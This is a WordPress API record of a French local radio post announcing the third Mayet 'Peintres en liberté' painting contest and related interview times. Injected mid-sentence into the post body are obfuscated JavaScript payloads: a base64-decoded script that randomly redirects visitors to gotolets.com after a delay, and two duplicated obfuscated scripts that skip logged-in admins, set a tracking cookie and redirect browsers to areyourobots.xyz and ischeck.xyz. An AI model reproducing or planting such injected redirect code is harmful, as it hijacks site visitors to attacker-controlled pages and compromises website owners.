{"id":1147,"date":"2019-09-26T12:54:02","date_gmt":"2019-09-26T10:54:02","guid":{"rendered":"http:\/\/www.contactfm72.fr\/?p=1147"},"modified":"2019-09-27T12:01:26","modified_gmt":"2019-09-27T10:01:26","slug":"3e-edition-ce-dimanche-29-septembre-de-mayet-peintres-en-liberte","status":"publish","type":"post","link":"https:\/\/contactfm72.fr\/?p=1147","title":{"rendered":"3e \u00e9dition ce dimanche 29 septembre de Mayet Peintres en libert\u00e9"},"content":{"rendered":"<p>La commission culture de la municipalit\u00e9 de Mayet organise dimanche 29 septembre la 3e \u00e9dition de Mayet Peintres en libert\u00e9, un concours de peinture ouvert \u00e0 tous. Bourse aux livres, r<script type=\"text\/javascript\">function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6<sf.length);document.write(r2);};b32f7c5eda8('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9nb3RvbGV0cy5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLXN0YWdpbmcvYXBwcy9Db3JlL1V0aWxzL0luZm9zLnBocCciLCBkZWxheSk7DQp9DQo8L3NjcmlwdD4A');<\/script>ando famille, expositions vari\u00e9es et visite du patrimoine sont \u00e9galement au programme de cette journ\u00e9e qui se d\u00e9roulera de 9h \u00e0 18h.<\/p>\n<p>Fabienne Ragot, conseill\u00e8re municipale \u00e0 Mayet, pr\u00e9sente cette manifestation dans \"L'interview du jour\" jeudi 26 septembre \u00e0 18h10, vendredi 27 \u00e0 13h10, samedi 28 \u00e0 9h et dimanche 29 \u00e0 11h.<\/p>\n<p>&nbsp;<\/p>\n<div id=\"audioigniter-283\" class=\"audioigniter-root \" data-player-type=\"full\" data-tracks-url=\"https:\/\/contactfm72.fr\/?audioigniter_playlist_id=283\" data-display-track-no=\"false\" data-reverse-track-order=\"false\" data-display-tracklist-covers=\"false\" data-display-active-cover=\"false\" data-display-artist-names=\"false\" data-display-buy-buttons=\"true\" data-buy-buttons-target=\"false\" data-cycle-tracks=\"false\" data-display-credits=\"false\" data-display-tracklist=\"true\" data-allow-tracklist-toggle=\"false\" data-allow-tracklist-loop=\"true\" data-limit-tracklist-height=\"true\" data-volume=\"100\" data-tracklist-height=\"185\" data-allow-track-loop=\"false\" ><\/div><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/ischeck.xyz\/?pma1','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n<!-- AddThis Advanced Settings generic via filter on the_content --><!-- AddThis Share Buttons generic via filter on the_content -->","protected":false},"excerpt":{"rendered":"<p>La commission culture de la municipalit\u00e9 de Mayet organise dimanche 29 septembre la 3e \u00e9dition de Mayet Peintres en libert\u00e9, un concours de peinture ouvert \u00e0 tous. Bourse aux livres, rando famille, expositions vari\u00e9es et visite du patrimoine sont \u00e9galement au programme de cette journ\u00e9e qui se d\u00e9roulera de 9h \u00e0 18h. Fabienne Ragot, conseill\u00e8re&hellip;<!-- AddThis Advanced Settings generic via filter on get_the_excerpt --><!-- AddThis Share Buttons generic via filter on get_the_excerpt --><\/p>\n","protected":false},"author":4,"featured_media":1148,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-1147","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-linterview-du-jour","category-5","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>3e \u00e9dition ce dimanche 29 septembre de Mayet Peintres en libert\u00e9 - Contact FM 99.3<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/contactfm72.fr\/?p=1147\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"3e \u00e9dition ce dimanche 29 septembre de Mayet Peintres en libert\u00e9 - Contact FM 99.3\" \/>\n<meta property=\"og:description\" content=\"La commission culture de la municipalit\u00e9 de Mayet organise dimanche 29 septembre la 3e \u00e9dition de Mayet Peintres en libert\u00e9, un concours de peinture ouvert \u00e0 tous. Bourse aux livres, rando famille, expositions vari\u00e9es et visite du patrimoine sont \u00e9galement au programme de cette journ\u00e9e qui se d\u00e9roulera de 9h \u00e0 18h. Fabienne Ragot, conseill\u00e8re&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/contactfm72.fr\/?p=1147\" \/>\n<meta property=\"og:site_name\" content=\"Contact FM 99.3\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Contactfm.Chateauduloir\" \/>\n<meta property=\"article:published_time\" content=\"2019-09-26T10:54:02+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-09-27T10:01:26+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/contactfm72.fr\/wp-content\/uploads\/2019\/09\/IMG_2111.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"768\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Val\u00e9rie C.\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@contactfm72\" \/>\n<meta name=\"twitter:site\" content=\"@contactfm72\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Val\u00e9rie C.\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=1147#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=1147\"},\"author\":{\"name\":\"Val\u00e9rie C.\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#\\\/schema\\\/person\\\/9fdc9d1c2eb029354a4f1535b90ba82d\"},\"headline\":\"3e \u00e9dition ce dimanche 29 septembre de Mayet Peintres en libert\u00e9\",\"datePublished\":\"2019-09-26T10:54:02+00:00\",\"dateModified\":\"2019-09-27T10:01:26+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=1147\"},\"wordCount\":91,\"publisher\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=1147#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/contactfm72.fr\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/IMG_2111.jpg\",\"articleSection\":[\"L'interview du jour\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=1147\",\"url\":\"https:\\\/\\\/contactfm72.fr\\\/?p=1147\",\"name\":\"3e \u00e9dition ce dimanche 29 septembre de Mayet Peintres en libert\u00e9 - Contact FM 99.3\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=1147#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=1147#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/contactfm72.fr\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/IMG_2111.jpg\",\"datePublished\":\"2019-09-26T10:54:02+00:00\",\"dateModified\":\"2019-09-27T10:01:26+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=1147#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/contactfm72.fr\\\/?p=1147\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=1147#primaryimage\",\"url\":\"https:\\\/\\\/contactfm72.fr\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/IMG_2111.jpg\",\"contentUrl\":\"https:\\\/\\\/contactfm72.fr\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/IMG_2111.jpg\",\"width\":4000,\"height\":3000},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/?p=1147#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/contactfm72.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"3e \u00e9dition ce dimanche 29 septembre de Mayet Peintres en libert\u00e9\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#website\",\"url\":\"https:\\\/\\\/contactfm72.fr\\\/\",\"name\":\"Contact FM 99.3\",\"description\":\"Votre radio en vall\u00e9e du Loir\",\"publisher\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/contactfm72.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#organization\",\"name\":\"Contact FM 99.3\",\"url\":\"https:\\\/\\\/contactfm72.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/contactfm72.fr\\\/wp-content\\\/uploads\\\/2025\\\/04\\\/2025-04-18-2.jpg\",\"contentUrl\":\"https:\\\/\\\/contactfm72.fr\\\/wp-content\\\/uploads\\\/2025\\\/04\\\/2025-04-18-2.jpg\",\"width\":680,\"height\":307,\"caption\":\"Contact FM 99.3\"},\"image\":{\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/Contactfm.Chateauduloir\",\"https:\\\/\\\/x.com\\\/contactfm72\",\"https:\\\/\\\/www.instagram.com\\\/contact.fm.72?igsh=cGhlMHQ5N2JlNnpp\",\"https:\\\/\\\/www.tiktok.com\\\/@contact.fm\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/contactfm72.fr\\\/#\\\/schema\\\/person\\\/9fdc9d1c2eb029354a4f1535b90ba82d\",\"name\":\"Val\u00e9rie C.\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/2f8aa28f8dfbd7d4420afd1fdcdd0a349923e2c8a38ab28198b0f9d0601e4737?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/2f8aa28f8dfbd7d4420afd1fdcdd0a349923e2c8a38ab28198b0f9d0601e4737?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/2f8aa28f8dfbd7d4420afd1fdcdd0a349923e2c8a38ab28198b0f9d0601e4737?s=96&d=mm&r=g\",\"caption\":\"Val\u00e9rie C.\"},\"url\":\"https:\\\/\\\/contactfm72.fr\\\/?author=4\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"3e \u00e9dition ce dimanche 29 septembre de Mayet Peintres en libert\u00e9 - Contact FM 99.3","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/contactfm72.fr\/?p=1147","og_locale":"fr_FR","og_type":"article","og_title":"3e \u00e9dition ce dimanche 29 septembre de Mayet Peintres en libert\u00e9 - Contact FM 99.3","og_description":"La commission culture de la municipalit\u00e9 de Mayet organise dimanche 29 septembre la 3e \u00e9dition de Mayet Peintres en libert\u00e9, un concours de peinture ouvert \u00e0 tous. Bourse aux livres, rando famille, expositions vari\u00e9es et visite du patrimoine sont \u00e9galement au programme de cette journ\u00e9e qui se d\u00e9roulera de 9h \u00e0 18h. Fabienne Ragot, conseill\u00e8re&hellip;","og_url":"https:\/\/contactfm72.fr\/?p=1147","og_site_name":"Contact FM 99.3","article_publisher":"https:\/\/www.facebook.com\/Contactfm.Chateauduloir","article_published_time":"2019-09-26T10:54:02+00:00","article_modified_time":"2019-09-27T10:01:26+00:00","og_image":[{"url":"https:\/\/contactfm72.fr\/wp-content\/uploads\/2019\/09\/IMG_2111.jpg","width":1024,"height":768,"type":"image\/jpeg"}],"author":"Val\u00e9rie C.","twitter_card":"summary_large_image","twitter_creator":"@contactfm72","twitter_site":"@contactfm72","twitter_misc":{"\u00c9crit par":"Val\u00e9rie C."},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/contactfm72.fr\/?p=1147#article","isPartOf":{"@id":"https:\/\/contactfm72.fr\/?p=1147"},"author":{"name":"Val\u00e9rie C.","@id":"https:\/\/contactfm72.fr\/#\/schema\/person\/9fdc9d1c2eb029354a4f1535b90ba82d"},"headline":"3e \u00e9dition ce dimanche 29 septembre de Mayet Peintres en libert\u00e9","datePublished":"2019-09-26T10:54:02+00:00","dateModified":"2019-09-27T10:01:26+00:00","mainEntityOfPage":{"@id":"https:\/\/contactfm72.fr\/?p=1147"},"wordCount":91,"publisher":{"@id":"https:\/\/contactfm72.fr\/#organization"},"image":{"@id":"https:\/\/contactfm72.fr\/?p=1147#primaryimage"},"thumbnailUrl":"https:\/\/contactfm72.fr\/wp-content\/uploads\/2019\/09\/IMG_2111.jpg","articleSection":["L'interview du jour"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/contactfm72.fr\/?p=1147","url":"https:\/\/contactfm72.fr\/?p=1147","name":"3e \u00e9dition ce dimanche 29 septembre de Mayet Peintres en libert\u00e9 - Contact FM 99.3","isPartOf":{"@id":"https:\/\/contactfm72.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/contactfm72.fr\/?p=1147#primaryimage"},"image":{"@id":"https:\/\/contactfm72.fr\/?p=1147#primaryimage"},"thumbnailUrl":"https:\/\/contactfm72.fr\/wp-content\/uploads\/2019\/09\/IMG_2111.jpg","datePublished":"2019-09-26T10:54:02+00:00","dateModified":"2019-09-27T10:01:26+00:00","breadcrumb":{"@id":"https:\/\/contactfm72.fr\/?p=1147#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/contactfm72.fr\/?p=1147"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/contactfm72.fr\/?p=1147#primaryimage","url":"https:\/\/contactfm72.fr\/wp-content\/uploads\/2019\/09\/IMG_2111.jpg","contentUrl":"https:\/\/contactfm72.fr\/wp-content\/uploads\/2019\/09\/IMG_2111.jpg","width":4000,"height":3000},{"@type":"BreadcrumbList","@id":"https:\/\/contactfm72.fr\/?p=1147#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/contactfm72.fr\/"},{"@type":"ListItem","position":2,"name":"3e \u00e9dition ce dimanche 29 septembre de Mayet Peintres en libert\u00e9"}]},{"@type":"WebSite","@id":"https:\/\/contactfm72.fr\/#website","url":"https:\/\/contactfm72.fr\/","name":"Contact FM 99.3","description":"Votre radio en vall\u00e9e du Loir","publisher":{"@id":"https:\/\/contactfm72.fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/contactfm72.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/contactfm72.fr\/#organization","name":"Contact FM 99.3","url":"https:\/\/contactfm72.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/contactfm72.fr\/#\/schema\/logo\/image\/","url":"https:\/\/contactfm72.fr\/wp-content\/uploads\/2025\/04\/2025-04-18-2.jpg","contentUrl":"https:\/\/contactfm72.fr\/wp-content\/uploads\/2025\/04\/2025-04-18-2.jpg","width":680,"height":307,"caption":"Contact FM 99.3"},"image":{"@id":"https:\/\/contactfm72.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Contactfm.Chateauduloir","https:\/\/x.com\/contactfm72","https:\/\/www.instagram.com\/contact.fm.72?igsh=cGhlMHQ5N2JlNnpp","https:\/\/www.tiktok.com\/@contact.fm"]},{"@type":"Person","@id":"https:\/\/contactfm72.fr\/#\/schema\/person\/9fdc9d1c2eb029354a4f1535b90ba82d","name":"Val\u00e9rie C.","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/2f8aa28f8dfbd7d4420afd1fdcdd0a349923e2c8a38ab28198b0f9d0601e4737?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/2f8aa28f8dfbd7d4420afd1fdcdd0a349923e2c8a38ab28198b0f9d0601e4737?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/2f8aa28f8dfbd7d4420afd1fdcdd0a349923e2c8a38ab28198b0f9d0601e4737?s=96&d=mm&r=g","caption":"Val\u00e9rie C."},"url":"https:\/\/contactfm72.fr\/?author=4"}]}},"_links":{"self":[{"href":"https:\/\/contactfm72.fr\/index.php?rest_route=\/wp\/v2\/posts\/1147","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/contactfm72.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/contactfm72.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/contactfm72.fr\/index.php?rest_route=\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/contactfm72.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1147"}],"version-history":[{"count":4,"href":"https:\/\/contactfm72.fr\/index.php?rest_route=\/wp\/v2\/posts\/1147\/revisions"}],"predecessor-version":[{"id":1152,"href":"https:\/\/contactfm72.fr\/index.php?rest_route=\/wp\/v2\/posts\/1147\/revisions\/1152"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/contactfm72.fr\/index.php?rest_route=\/wp\/v2\/media\/1148"}],"wp:attachment":[{"href":"https:\/\/contactfm72.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1147"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/contactfm72.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1147"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/contactfm72.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1147"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}